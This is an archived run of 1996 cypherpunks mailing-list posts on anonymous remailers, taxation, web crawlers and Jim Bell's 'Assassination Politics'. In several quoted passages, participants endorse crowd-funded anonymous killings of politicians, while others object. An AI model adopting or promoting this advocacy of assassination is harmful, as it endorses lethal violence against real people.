you must be aware that we don't forgive easily and there will be groups
who wish to kill politicos who've "ruined our lives because of what they
did x years ago".  If those who begin AP campaigns on "retired" govt.
employees will be "playing unfairly" and your system has a clause to
tackle them, I can see a group using a succession of politicos (each of
whom gains amnesty by retiring after a bit) to accomplish what they wish
to.

:I agree.  Which is why I'd much prefer a method to preferentially target a
:relatively smaller number of people, and I've invented (discovered?) just
:such a system.  Why not let it work?

I'd prefer a system that doesn't "target" people at all.

:Why not kill those Iranian leaders, using AP?  And if you're afraid they'll
:retaliate against "our" leaders, I see nothing wrong with that, either.
:It's the leaders who maintain the dispute.

Sure, and suppose the option is that there be no dispute at all.  So
Rushdie (or you or I) becomes the sacrifical lamb, precisely because the
"leaders" value their own lives, but ostensibly to kill the "dispute" in
the bud.  One of the fundamental principles of justice is that it be
comensurate (in some sense) to the crime, AP lacks that aspect.  "Final
solutions" are all it has, but final solutions aren't always desireable.

:Hey, I realized that long ago!  But I'm not under any illusion that this
:system can be molded to conform to my wishes alone:  If I could, I'd become
:a dictator and the cycle of tyranny would continue.

The question is not one of becoming a dictator, but rather one of what
values will be protected, what freedoms will people have in the
world/state you imagine.  I think the values AP engenders are not the ones
we want.  We probably don't want to legitimize murder.  It's difficult to
operate in a vacuum of principles/values, we can't simply say, "well
whatever people will want to happen will happen and why not give them that
choice".  Marx was not the first to poitn out that institutions influence
our actions, that we are products of our times, that the choices we face
are as much determined by our own preferences as they are by the world
around us.  AP will create an environment where, I believe, an
undesireable set of options will be presented to each of us.  This is
the "outcome" argument, i.e. undesireable ends, the means themselves are
reprehensible.


:The only reason there might be "many others waiting to take his place" is
:that assassination is actually a rare event.  Make it easily accomplished,
:and who would want to take any politician's place?

Only the fanatic

:It isn't that it "has to" be violent.  Resignation is always an option.
:Problem is, they don't want to give up their positions of power.

You've heard about the elections where libertarian candidates ran for
office with the objective of doing away with the office if they were
elected.  I believe one such candidate won the election and came through
on his promise.

:That depends entirely on what your definition of instigating violence really
:is.  I happen to believe that the act of collecting taxes, involuntarily, IS
:the "instigation of violence" even if the victim gives up his assets without
:a fight, if there is the prospect of eventual violence should he refuse to
:cooperate.  Until you see this, you'll have a warped view of the propriety
:of AP, not to mention the libertarian non-initiation of force  principle.
:(NIOFP.)

As I've said, the minimalist state is desireable in my opinion.  The most
efficient system of taxation is the truly flat tax (i.e. a fixed amount
for each individual), since each person derives aprox. equivalent benefits
from the minimalist state, their contributions are also equal.  Each of us
derives some benefits from the existence of the state, some of these
benefits are non-exclusionary.  Till these benefits are dependent on
territory and jurisdiction taxation of those who reside within the
jurisdiction/territory will have to be enforced.  You must of course, be
aware of the medieval practice of making an offender an "outlaw", i.e. not
under the protection of any laws.  These outlaws were then fair game for
anyone.  When we have arrived at the point where the free-rider problem
does not exist for things like national defense (i.e the shields won't
exist over your property, and you'll enforce your ownership of it
yourself) you will have the option (once again) of becoming an outlaw.  I
don't think it's going to be very pretty.  To bring up another subject, we
make compromises.  I personally find socialists endearing and am willing
to make certain compromises to live with them amicably.  AP will draw
battle-lines that will make such associations extremely hard to maintain.
I'd rather not be the member of a "group" and have that membership/taint
dictate the degree to which I can associate with a particular set of
people.  AP, in providing "final solutions", will bring about a state of
affairs where the actions of a particular group (which they think are
legitimate and do not run counter to the rules of the game) will be
unacceptable for another group and the "finality" of these actions will
create rifts.  Violence does not beget peace.

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMakHvBwDKqi8Iu65AQEmnQMArCatzEoPOHSiSSlb8yhMupx0sbx4ZwZs
pY6A78B+LQwceyTnPE9mQ/4C8Zyr+IF9MPEKJgXJ8TPkeL/P24k8+oqiUwXq0pMN
UsyS8c4RUW3d72s/ctV9tDQKumu9zc/p
=BZV+
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Mon, 27 May 1996 12:56:18 +0800
To: cypherpunks@toad.com
Subject: Quickremail v1.0b
Message-ID: <Pine.LNX.3.93.960526214213.1441A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

I have just released Quickremail, a UNIX program that provides an easy
interface to install an anonymous remailer.  Just unzip and untar in your
home directory, execute remailer-install.sh, and then you will have a fully
functional remailer.  You do not need root access to install it.  It is
available at http://www.voicenet.com/~markm/quickremail.1.0.b.tar.gz .

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMakKLLZc+sv5siulAQFRggP8CUjAKn6WKL73PuPbG+h1DsZKj+K5v0iG
3a01RPmQca3VWa8jeFsX6OfUH6XrI4L+GN8o2W+6nzULur36Fyxovj9NN0A8sGBu
Ww1v0wu6MTA/r6HXiaGmPdSCZ5BeUF7TqPI2C9mgsAqlTinffR85aGpjYaev2Ffq
MumHbq1wH7g=
=4PPV
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.NYU.EDU>
Date: Mon, 27 May 1996 14:09:24 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <9605262337.AA24223@cti02.citenet.net>
Message-ID: <Pine.ULT.3.92.960526213959.18312B-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 May 1996, Jean-Francois Avon wrote:

:How would you qualify the seizing of 50+ % of our productive work?
:<snip>
:Are you telling that giving your wallet to a mugger is not done under
:violence directed against you since he did not shoot you or beat you
:in the first place?  Do you tell me that the fact that he did not use
:his gun means that there is no violence implied?
:<snip>
:Under every pile of red-tape lies a fully loaded gun.  And *this* is
:what gives govt employees their attitude toward you.

It is quite obvious that the state enforces taxation via coercion, whether
that coercion always takes the form of "your money or your life" is
doubtful, more often it involves the threat of incarceration rather than
death.  The (supposed) difference between taxation and robbery is that one
is ostensibly deriving some benefit from taxation (i.e. even if it is used
for welfare, the argument is this is some sort of insurance scheme in that
you would derive some benefits if unemployed, we believe unemployment
insurance should be voluntary but that's another matter).  Of course the
state is inefficient and taxes do not always go where they are meant to,
but it is difficult to sustain an analogy between a mugging and taxation.
A money laundering scheme is probably much more appropriate (ironic
because we only launder money to pacify the state), you must appreciate
the subtlety of taxation.  You might very well believe that taxation is
robbery, and everyone else who reads Reason might agree with you, but the
rest of the world is not about to look at this in the same way, and you
hurt your cause by the rhetoric.  Most people, quite rightly in my
opinion, believe taxes are necessary and that collecting them forcefully
is the only option available to us.  The minimalist state will probably
have an "out" clause and you will be able to go out "into the woods" and
set up your own little libertarian (or anarcho-capitalist) commune with
all the others who believe all taxation is robbery, and you'll probably be
able to keep your Uzi to guard yoruself against your neighbours as well
(good luck).  I'll be happy with a state-run law enforcement agency (of a
form different from the one we have today of course).

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMakLFxwDKqi8Iu65AQHDVQL+OqP/NogXPNYXTfYE2JmYcpsaR84ToMti
X2iToIWKQ6F7xUzYT/lbiOg45h8KLPXr6BNpoVpoVowukXdM8ZTEVTaARpMM/iY2
bF6FUZ33c41eV58ZJriJh6yjMjlKwUsE
=u2vX
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 27 May 1996 15:56:56 +0800
To: cypherpunks@toad.com
Subject: Re: nCognito is Dead..
In-Reply-To: <Pine.LNX.3.93.960526182121.413B-100000@gak>
Message-ID: <Pine.GUL.3.93.960526215524.10152G-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


To the honor list of ISPs accepting of free/anonymous speech, add:

dhp.com
shellback.com
l0pht.com (not exactly an ISP, though...)

I'm maintaining a list of sorts at
http://www-leland.stanford.edu/~llurch/potw2/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 27 May 1996 16:10:29 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: WhoWhere Robot strikes again
In-Reply-To: <01I56K3M2RAU8Y4ZV3@mbcl.rutgers.edu>
Message-ID: <Pine.GUL.3.93.960526220513.10152I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 27 May 1996, E. ALLEN SMITH wrote:

> a (randomly-created) link to http://foo.bar.com/563.html etcetera? Or are they
> looking at more specific locations that couldn't be faked this way?

What they are doing is spidering the entire web looking for anything that
looks like an email address, running a dictionary finger attack on the
host part of any email addresses they find, and reporting things that look
like lists of email addresses to humans (or the closest approximation
employed by WhoWhere). Usually they do port scans for http and whois
servers too.

The way they bootstrapped their database was with dictionary searches on
InterNIC and okra.ucr.edu, with a significant enough effect that lawsuits
were considered.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 27 May 1996 15:49:07 +0800
To: cypherpunks@toad.com
Subject: Re: WhoWhere Robot strikes again
In-Reply-To: <v03006f07adcee83e9a51@[198.93.25.98]>
Message-ID: <Pine.GUL.3.93.960526221247.10152J-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


Btw, when they bought me lunch a few weeks ago, they promised to register
their robot and follow the robot exclusion standard right away.

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Mon, 27 May 1996 17:31:56 +0800
To: "E. ALLEN SMITH" <markm@voicenet.com
Subject: Re: Mixmaster version usable with POP?
Message-ID: <adceeb820a021004e8a8@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:44 PM 5/26/96, E. ALLEN SMITH wrote:
>From:   IN%"markm@voicenet.com"  "Mark M." 26-MAY-1996 18:46:13.23
>
>>On Linux this works:
>>popclient -3 -c POPHOSTNAME | formail -s mixmaster -R >> $MAIL
>
>>It will work on any system that has formail and popclient on it.
>
>        Is this only for getting mail, or also for sending it? Sorry, I'm
>not very familiar with UNIX, especially the pipe commands.
>        -Allen

That would be just for receiving it. It is fine to use sendmail for sending
email over a dialup connection. It is just not very good for receiving it.

        -Lance

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Mon, 27 May 1996 16:51:11 +0800
To: cypherpunks@toad.com
Subject: Re: Quickremail v1.0b
Message-ID: <adceed350b0210044f26@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


Which remailers does it install?

        -Lance

At 6:49 PM 5/26/96, Mark M. wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>I have just released Quickremail, a UNIX program that provides an easy
>interface to install an anonymous remailer.  Just unzip and untar in your
>home directory, execute remailer-install.sh, and then you will have a fully
>functional remailer.  You do not need root access to install it.  It is
>available at http://www.voicenet.com/~markm/quickremail.1.0.b.tar.gz .
>
>- -- Mark
>
>=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
>markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
>http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
>((2b) || !(2b))                 | Old key now used only for signatures
>"The concept of normalcy is just a conspiracy of the majority" -me
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.3
>Charset: noconv
>
>iQCVAwUBMakKLLZc+sv5siulAQFRggP8CUjAKn6WKL73PuPbG+h1DsZKj+K5v0iG
>3a01RPmQca3VWa8jeFsX6OfUH6XrI4L+GN8o2W+6nzULur36Fyxovj9NN0A8sGBu
>Ww1v0wu6MTA/r6HXiaGmPdSCZ5BeUF7TqPI2C9mgsAqlTinffR85aGpjYaev2Ffq
>MumHbq1wH7g=
>=4PPV
>-----END PGP SIGNATURE-----

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 15:17:54 +0800
To: hfinney@shell.portal.com
Subject: Re: Children's Privacy Act
Message-ID: <01I56FGPW4PW8Y4ZUF@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"hfinney@shell.portal.com"  "Hal" 24-MAY-1996 22:08:34.83

>In a way, our position is like those revolutionaries who are convinced
>the government is evil, while the populace mindlessly goes along with
>the status quo.  Terrorists inflict terror largely to force the
>government to crack down, raising popular awareness of its oppressive
>nature, and fostering revolutionary feelings.

	This has some interesting analogies in the area of currency, and
promoting privately-backed currencies. We want privately-backed currencies
because they won't have the political motives (e.g., Senator Harkin holding
up Greenspan's confirmation because Greenspan doesn't produce enough inflation
for Harkin's voters' liking) to have inflation that governmental agencies do.
But that doesn't mean that inflation of _governmental_ currencies isn't a
good thing from our viewpoint (so long as we're invested into non-governmental
currencies and other investments); it encourages people to switch.
	It is also interesting, in the same area of thought, to take a look at
the effects of the inflation-indexed bonds that the Treasury Dept looks to be
coming out with soon. If there's enough inflation for people to be interested,
and those people trust the government, then people will move their capital from
more liquid areas (e.g., bank accounts) into these (as well as from existing
governmental bonds). This reduces the value of money, since less people want to
hold it in liquid form (for one thing, if inflation is a concern, you might as
well go ahead and spend money) and there is more of it in that liquid form -
democratically-elected governments that get this money are going to spend it or
use it to reduce taxes. That means the rate of inflation will increase...
meaning the government will have to pay out more on the bonds, and those
buying the bonds (or, preferably, moving to other currencies) will increase.
Such bonds are normally created by governments with high inflation rates -
usually prior to a hyperinflationary collapse. It's an interesting question
whether this is cause or effect - likely both.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Mon, 27 May 1996 17:59:53 +0800
To: Black Unicorn <unicorn@schloss.li>
Subject: Re: An alternative to remailer shutdowns
Message-ID: <199605270636.XAA02836@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:12 AM 5/27/96 -0400, Black Unicorn wrote:
>On Sat, 25 May 1996, jim bell wrote:
>
>> >	Why the first in chain? If the anti-traffic-analysis provisions are
>> >working properly, it should be impossible to prove that a given first remailer
>> >was the first remailer for any particular message. I had thought that even
>> >civil courts required that you be the person who committed some act, not the
>> >person who _might_ have committed some act. Otherwise, all the remailers are
>> >in danger. This is even if someone tries an entrapment by sending through some
>> >illegal material - if the courts accept that they should be allowed to do this,
>> >then all the remailers they chained are going to be hit.
>> 
>> Likewise, I don't see why the first address in the chain is vulnerable, as 
>> long as the message subsequently passes through at least one trustworthy 
>> remailer, and probably  a temporary output address.  
>
>I repeat, all it takes is one person to send through only one remailer
>(perhaps even a Co$ plant) and the first in chain remailer is toasted.
>
>Think before you type please.

You should take your own advice.  The mere fact that the first link in the chain is "known" doesn't mean that it is provably involved.  Without a substantial amount of bugging that the COS hasn't the resources to do, there is a big difference between them _believing_ that a given message originated there, and being able to prove it in court.  And notice my caveat:  "As long as the message subsequently passes through at least one trustworthy remailer, and probably a temporary output address."


Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Mon, 27 May 1996 14:50:00 +0800
To: Alan Horowitz <alanh@infi.net>
Subject: Re: COMMUNITY CONNEXION ANNOUNCES WORLDWIDE BETA-TEST OF THE ANONYMIZER (fwd)
In-Reply-To: <Pine.SV4.3.91.960526200257.20061E-100000@larry.infi.net>
Message-ID: <Pine.SUN.3.91.960526234415.19155B-100000@tipper.oit.unc.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 26 May 1996, Alan Horowitz wrote:

> Date: Sun, 26 May 1996 14:17:38 -0400
> From: Ralph Jennett <jennett@citicom.com>
> To: Alan Horowitz <alanh@infi.net>
> 
> Of course the people at Community Connection know what you are up to when
> you use their service.


So sameer is a deep-cover plant... but for whom? I know it's not the CIA, 
because they're too stretched at the moment (ever wonder why all those 
voice mail systems keep putting  you on hold - it's because they don't 
have enough agents free to monitor all calls, and it woudn't be the NSA, 
because it'd be too tacky). I reckon it's the spirit of Vince Foster 
inhabiting his body. It all fits together too neatly







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Subir Grewal <grewals@acf2.NYU.EDU>
Date: Mon, 27 May 1996 16:37:59 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: [SCARE]:  "If you only knew what we know..."
In-Reply-To: <199605270314.UAA26114@mail.pacifier.com>
Message-ID: <Pine.ULT.3.92.960526235213.28517F-100000@acf2.NYU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 26 May 1996, jim bell wrote:

:But it wouldn't matter.  They wouldn't know who to target, and the people
:wanting to form a state have an inherent disadvantage against those who do
:not:  The act of forming the state identifies them.

Real world anonymity is difficult to buy, and actions such as murder (or
what you'd like to call "self-defense") take place in the real world.

:It doesn't work like that.  The act of formation of a state inevitably calls
:attention to oneself.  The act of opposing that formation does not.  AP is
:"biased," as it were, against centralized, organized political structure
:that arouses the ire of even a tiny fraction of the population.  A person
:who dedicates himself to ELIMINMATING the state, and does so anonymously, is
:difficult or impossible to target.

I'd expect a realization of AP to promote a great backlash from a variety
of quarters.  Such methods, besides being unethical, are probably going to
be used as fodder to infringe the liberties of others.  In other words, a
witch-hunt will result, AP advocates marginalized (if they are
discovered).  My original reservations, on the grounds of unjust means
still stand, maybe we can return to this discussion sometime later.

:No, the donations will be made against those people who are actually seen by
:the people as the real problem.  In an "AP-world," there would be no
:"Islamic leaders" to call for Rushdie's death.  True, if an author like
:Rushdie said or wrote something that really angered a substantial number of
:people, they might individually be aroused enough to target him, but that is
:far less likely than ire directed by an Islamic leader today, I think.

"Religious" fanatics have great appeal, I don't think even AP will make
them "go away", the odds are they'll become martyrs.  And we know where
that takes us.

:I (and others) have predicted that there will indeed be "court systems" in
:place, although they will be numerous, competing, and voluntary, which will
:turn most offenses into crimes punishable by fines.  That will adjust the
:punishment to the crime, in most people's opinions.

I wasn't talking about the legal system in an AP world, but the idea that
AP is justice in some sense.  Incidentally, a purely civil law court is
what I'd like as well, and competing courts and arbitration systems sound
good to me.

:No "values will be protected," except those that the individuals in society
:choose to be protected.
<snip>

:>  Marx was not the first to poitn out that institutions influence
:>our actions, that we are products of our times, that the choices we face
:>are as much determined by our own preferences as they are by the world
:>around us.  AP will create an environment where, I believe, an
:>undesireable set of options will be presented to each of us.  This is
:>the "outcome" argument, i.e. undesireable ends, the means themselves are
:>reprehensible.

The answer (in some sense) to your second statement is contained in the
little section I wrote earlier.  It's an institutional argument.

hostmaster@trill-home.com * Symbiant test coaching * Blue-Ribbon * Lynx 2.5
WHERE CAN THE MATTER BE

	Oh, dear, where can the matter be
	When it's converted to energy?
	There is a slight loss of parity.
	Johnny's so long at the fair.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Key Escrow = Conscription for the masses | 2048 bit via finger

iQB1AwUBMakuLBwDKqi8Iu65AQHxzAMAteGkGW3Y2eIzpli5UuoaTUK/4hlQbZkN
eutzCIgsBN2jUtBau0zz4Vjr0p+edTyXXhiBUv3VXjKPkNh4nPZcmG6kv37BLjlg
+EhVAl55v8/+b2pqnQ0kx5a+9vr58c7H
=VKHB
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Mon, 27 May 1996 16:45:33 +0800
To: cypherpunks@toad.com
Subject: Re: nCognito is Dead.. (fwd)
Message-ID: <199605270532.AAA28181@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Hi,

You can add SSZ (ssz.com) to the list. We accept anonymous accounts at
standard rates ($10/mo. for 12 mo.). This includes a web-page. Contact
'staff@ssz.com' for further information.

We are currently supporting the Austin Cypherpunks Anonymous Remailer
project. If you would like more information please contact:

austin-cpunks@ssz.com


                                      Jim Choate



       "Reality is observer dependant"
                              \
                                \   \\/////
                                    |     | 
                                    (.) (.)
      ===========================oOO==(_)==OOo==========================             

         Tivoli an IBM company                  CyberTects: SSZ
         Customer Support Engineer              SOHO Consulting/VR/Robotics

         9442 Capitol of Texas Highway North    1647 Rutland
         Suite 500                              #244  
         Austin, TX 78759                       Austin, TX  78758

         Email: jchoate@tivoli.com              Email: ravage@ssz.com
         Phone: (512) 436-8893                  Phone: (512) 259-2994
         Fax:   (512) 345-2784                  Fax: n/a
         WWW:   www.tivoli.com                  WWW: www.ssz.com
         Modem: n/a                             Modem: (512) 836-7374
         Pager: n/a                             Pager: n/a
         Cellular: n/a                          Cellular: n/a

      ===================================================================

 
Forwarded message:

> From cypherpunks-errors@toad.com Mon May 27 00:10:29 1996
> Date: Sun, 26 May 1996 21:58:08 -0700 (PDT)
> From: Rich Graves <llurch@networking.stanford.edu>
> To: cypherpunks@toad.com
> Subject: Re: nCognito is Dead..
> In-Reply-To: <Pine.LNX.3.93.960526182121.413B-100000@gak>
> Message-ID: <Pine.GUL.3.93.960526215524.10152G-100000@Networking.Stanford.EDU>
> X-PGP-key: finger llurch@mordor.stanford.edu
> X-URL: http://www-leland.stanford.edu/~llurch/
> MIME-Version: 1.0
> Content-Type: TEXT/PLAIN; charset=US-ASCII
> Sender: owner-cypherpunks@toad.com
> Precedence: bulk
> 
> To the honor list of ISPs accepting of free/anonymous speech, add:
> 
> dhp.com
> shellback.com
> l0pht.com (not exactly an ISP, though...)
> 
> I'm maintaining a list of sorts at
> http://www-leland.stanford.edu/~llurch/potw2/
> 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 15:48:52 +0800
To: bruce@aracnet.com
Subject: Re: Children's Privacy Act
Message-ID: <01I56JFJ7EW08Y4ZUN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"bruce@aracnet.com"  "Bruce Baugh" 26-MAY-1996 17:00:35.76

>Righ. But in addition to the forcible acquisition of information, there's
>the unwitting acquisition - you are never informed that party A has
>transmitted information X to party B, who in turn passed it to C, who
>garbled it and then passed the erroneous info to D....

	Assume that they're gathering all information they can, unless they
make a specific agreement that they aren't doing so. Some magazines have that
as part of their subscriptions - they state that they only exchange mailing
list with certain other parties, wh have agreed that they won't transmit it
further; these magazines (e.g., Consumer Reports) also tend to give people an
opt-out option on even this exchange, incidentally.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Mon, 27 May 1996 17:56:40 +0800
To: Subir Grewal <grewals@acf2.NYU.EDU>
Subject: Re: [SCARE]:  "If you only knew what we know..."
Message-ID: <9605270445.AB06762@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 26 May 96 at 21:39, Subir Grewal wrote:


> Of course there are those who
> fervently believe in the socialist ideal 

But, my dear, even in the most libertarian or AP-ruled world, they 
would absolutely free to give away *all* of their salary for the 
causes they consider valid.  Only, thoses who don't agree with them 
would not be coerced into thoses noble causes.

> and would probably feel
> justified in killing the do nothing libertarians

This paragraph seems to indicate that the only difference between
libertarians and socialist is a mere difference of opinion and that
everybody is justified to act on their beliefs.  But the socialists
who pretend that are simply blanking out the fact that *they too*
recognize that Reality Is since they want to use force to get a
lunch out of the mouth of somebody who have one (and who happened to
produce it himself) to put it in the mouth of another who didn't
have.  Therefore, it is OK to deny reality when somebody come up
with arguements against socialism, but it is darn convenient to use
it (in the form of a loaded gun...)

> (as opposed to
> old-style liberals, i.e. minimalists) who ostensibly form the state.

BTW, they do not "ostensibly" form the state.  They simply 
*do*not*coerce* individuals into being sacrificial animals for the 
unearned benefits of others...

> For them, inaction might be sufficient cause to initiate an AP
> campaign.

Oh, you mean, "for them, anybody who pass a judgment of his own that 
contradict them should be killed"  I see...

> I'd prefer a system that doesn't "target" people at all.

I'd prefer a pink elephant with wings.  Do you think that govt does 
not target peoples?

> One of the fundamental principles of justice is that it be
> comensurate (in some sense) to the crime, AP lacks that aspect. 
> "Final solutions" are all it has, but final solutions aren't always
> desireable. 

JB seem to agree with the view that turning our most productive
individuals into sacrificial animals for the benefit of the less
productive is not exactly a kind thing to do.  I tend to agree.
To say "commensurate" means that you must quantify various things in 
their proper context.  I invite you to do so.


> The question is not one of becoming a dictator, but rather one of
> what values will be protected, what freedoms will people have in the
> world/state you imagine.  I think the values AP engenders are not
> the ones we want.  We probably don't want to legitimize murder. 

It does not legitimates murder per se.  I don't think that JB ever 
said that murder was legitimate.  He only explained that the 
technology makes it inevitable to happens and that he believes that 
the outcome will be a better society.  You will note that to the 
act of murdering, he opposed many other actions, including many that 
leads to direct loss of lives.  He claims that the positives will 
outnumber the negatives.  As to the morality, by your own standards, 
of starting a "Vietnam" war, I suppose it is highly questionnable, or 
so you seems to indicate.

> It's difficult to operate in a vacuum of principles/values, we can't
> simply say, "well whatever people will want to happen will happen
> and why not give them that choice".  

Jim Bell does not believe that AP will evolve in a moral vacuum.  On
the contrary (and most collectivists think he is wrong), I think he
believes that human beings have an intrinsic sense of justice and
that this will prevail.

> Marx was not the first to poitn
> out that institutions influence our actions, that we are products of
> our times, that the choices we face are as much determined by our
> own preferences as they are by the world around us.

Well, of course, our perception of reality is context dependent.  But 
you seems to attempt to hint that truth is relative because knowledge 
is contextual.  It looks like an attempt on reason.  


> :and who would want to take any politician's
> :place?
 
> Only the fanatic

I think that by the nature of AP, this would be ruled out.  Maybe 
there would be a fanatic president, but he would preside nothing 
because nobody would be there to enforce his fanatic views.  

> As I've said, the minimalist state is desireable in my opinion.  The
> most efficient system of taxation is the truly flat tax (i.e. a
> fixed amount for each individual), since each person derives aprox.
> equivalent benefits from the minimalist state, their contributions
> are also equal.  Each of us derives some benefits from the existence
> of the state, some of these benefits are non-exclusionary.  Till
> these benefits are dependent on territory and jurisdiction taxation
> of those who reside within the jurisdiction/territory will have to
> be enforced.

That is absolute BS.  It might have been true before, but with the
advent of the net and of computers and smart cards, it is becoming a
fallacy.  If Visa or Mastercard can operate on a voluntary basis,
the govt could also do it.  The technology makes it possible
that any individual who wish to subscribe to any of the various
insurances the govt could offer might do so.  Including contributions to
finance museums, research projects, etc.  And mandatory taxes could
be enforced in period of emergencies like wars, if ever they
happens.  

The population seems to have a very short memory: Before the great
wars, there was *no* income tax.  It is mainly with the advent of
socialism, coinciding with the nuclear era, that the taxes were hiked
to the level they are now.  Johnson blew up whatever Eisehower tried
to do.  Of course, it started before them but Eisehower tried to get
back to the old system.  I guess what defeated him what that too many
poeples longed for a free lunch...

Anyhow, we have the technology to institutes a card that would give 
access to most services like health care, unemployement insurance, 
etc.  Why don't they put it in place?

[Cypherpunkishstuff]

Hey guys, could you believe it?  I actually closed a post with some 
tiny relevance to CP!  Gee, my brain must have skipped a few cpu 
cycles!

JFA 
I am not subscribing to CP.  For me to read you, you must cc to me
directly.

 DePompadour, Societe d'Importation Ltee; Limoges porcelain, silverware and crystal
 JFA Technologies, R&D consultants: physicists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 I reserve the right to post publicly any private e-mail sent to me.
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Mon, 27 May 1996 15:49:50 +0800
To: markm@voicenet.com
Subject: Re: Mixmaster version usable with POP?
Message-ID: <01I56JIU6MHY8Y4ZUN@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"markm@voicenet.com"  "Mark M." 26-MAY-1996 18:46:13.23

>On Linux this works:
>popclient -3 -c POPHOSTNAME | formail -s mixmaster -R >> $MAIL

>It will work on any system that has formail and popclient on it.

	Is this only for getting mail, or also for sending it? Sorry, I'm
not very familiar with UNIX, especially the pipe commands.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
